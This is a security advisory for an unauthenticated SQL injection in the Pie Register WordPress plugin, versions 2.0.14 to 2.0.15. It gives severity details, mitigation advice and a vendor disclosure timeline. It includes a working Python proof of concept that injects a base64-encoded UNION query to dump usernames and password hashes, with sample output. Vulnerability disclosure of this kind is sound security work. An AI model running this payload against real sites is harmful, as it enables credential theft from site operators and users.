Pie Register 2.0.14-2.0.15, SQL Injection
User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are provided to any page, by any user (anonymous or otherwise). The input to the ‘invitaion_code’ parameter are decoded as Base64, and then inserted into the query without using SQL statement preparation, and as a result it is possible to UNION on your own query, as displayed in the PoC below.
Homepage
https://wordpress.org/plugins/pie-register/
CVSS Score
5
CSSS Vector
(AV:N/AC:L/Au:N/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Uninstall the plugin – or patch manually
Proof of Concept
The below PoC will output a list of Usernames and Hashed Passwords from the current database.
import requests,base64,re
url="http://localhost"
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
"show_dash_widget":1,
"invitaion_code":query_encoded
}
r = requests.get(url, params=params)
print re.search(r"<tr><td>([^<]*?)<", r.text).group(1)
Output
~$ python g0blin-00040.py
test,$P$BlI29cUx2Z0Wpt0DHALldoY.CCGrha0
Timeline
- 2015-03-16: Discovered
- 2015-03-16: Vendor notified
- 2015-03-17: Vendor responded – already fixed in a pending 2.0.15 release – stated would allow for review prior to release
- 2015-03-24: Vendor responded – stated new version in testing – will be released mid April
- 2015-04-13: Update requested from Vendor
- 2015-04-20: Update requested from Vendor
- 2015-04-20: Vendor states new version
- 2015-04-29: Update requested from Vendor – stated reports to be released on Monday due to lack of communication
- 2015-04-30: Version 2.0.15 released – issue still present – no chance for review given
- 2015-05-04: Advisory released: